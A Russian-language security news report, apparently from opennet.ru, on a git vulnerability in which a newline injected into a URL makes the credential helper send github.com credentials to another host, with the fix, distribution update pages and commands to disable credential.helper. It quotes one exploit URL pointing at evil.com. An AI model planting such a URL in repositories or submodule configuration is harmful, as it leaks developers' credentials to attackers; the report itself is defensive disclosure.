При указании URL вида «https://evil.com?%0ahost=github.com/» обработчик учётных данных при подключении к хосту evil.com передаст параметры аутентификации, заданные для github.com. Проблема проявляется при выполнении таких операций, как «git clone», в том числе при обработке URL для субмодулей (например, при выполнении «git submodule update» будут автоматически обработаны URL, заданные в файле .gitmodules из репозитория). Наибольшую опасность уязвимость представляет в ситуациях, когда разработчик выполняет клонирование репозитория не видя URL, например, при работе с субмодулями, или в системах, выполняющих автоматические действия, например, в скриптах сборки пакетов.
Для блокирования уязвимости в новых версиях запрещена передача символа новой строки в любых значениях, передаваемых через протокол обмена учётными данными. Для дистрибутивов проследить за выпуском обновлений пакетов можно на страницах Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD. В качестве обходного пути блокирования проблемы рекомендуется не использовать credential.helper при обращении к публичным репозиториям и не применять «git clone» в режиме «—recurse-submodules» с непроверенными репозиториями. Для полного отключения обработчика credential.helper, который выполняет сохранение и извлечение паролей из кэша, защищённого хранилища или файла с паролями, можно использовать команды:
git config --unset credential.helper git config --global --unset credential.helper git config --system --unset credential.helper
Источник: http://www.opennet.ru/opennews/art.shtml?num=52734